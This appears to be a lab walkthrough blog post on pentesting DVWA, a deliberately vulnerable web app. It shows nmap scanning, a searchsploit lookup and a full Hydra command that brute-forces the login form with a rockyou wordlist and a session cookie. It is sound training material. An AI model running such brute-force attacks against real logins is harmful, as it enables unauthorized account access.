DVWA 1.9+: Brute force password with Hydra

Published in

Hacker Toolbelt

3 min readMay 13, 2019

This is part II of DVWA 1.9 pentesting. In part I I’ve installed a new Ubuntu server running the application and configured it to run on host only mode.

This is the second article of the DVWA series. You can grab all articles here.

Prepare pentest

Let’s determine the IP address of our target machine. Log in and write down the address:

The address is 192.168.231.110. Now, in the Kali machine try to access through the browser:

Enter DVWA with ‘admin’ and ‘password’. Go to DVWA Security and set it to ‘Low’:

All set. Let’s start out pentest.

Scan target

$ nmap -sV 192.168.231.110

No surprise, it’s a linux machine running OpenSSH and Apache 2.4.29. Lets do a searchploit:

$ searchploit apache | grep 2.4

Found a possible exploit, a Root Privilege Escalation (CVE-2019–0211)!

Burp Suite

Burp Suite is pre-installed in Kali and is one of the tools I’ll use to test DVWA.

First, start Burp with default settings. In Firefox make the following changes so it uses Burp as a proxy to catch all traffic between our browser and the target.

Refreshing DVWA page you’ll see the following output in Burp:

Brute Force attack

Go to the‘Brute Force’ page. Try login and take notice of error message.

Now go and check Burp Suite output:

We have a URL, params, Cookie. Let’s try to brute force our way with Hydra:

$ hydra 192.168.231.110 -l admin -P /usr/share/wordlists/rockyou.txt http-get-form “/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie:PHPSESSID=3jr86cmf45oen0ggigm630fstu; security=low”

-l admin: username to use
-P /usr/share/wordlists/rockyou.txt: wordlist available
http-get-form “/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie:PHPSESSID=3jr86cmf45oen0ggigm630fstu; security=low”: URL to brute force, error message, cookie value.

End result:

Conclusion

Brute force is never an easy solution. In this scenario we were able to crack our target, but real world targets shouldn’t be this easy. In the next article we’ll try other vector of attack on DVWA.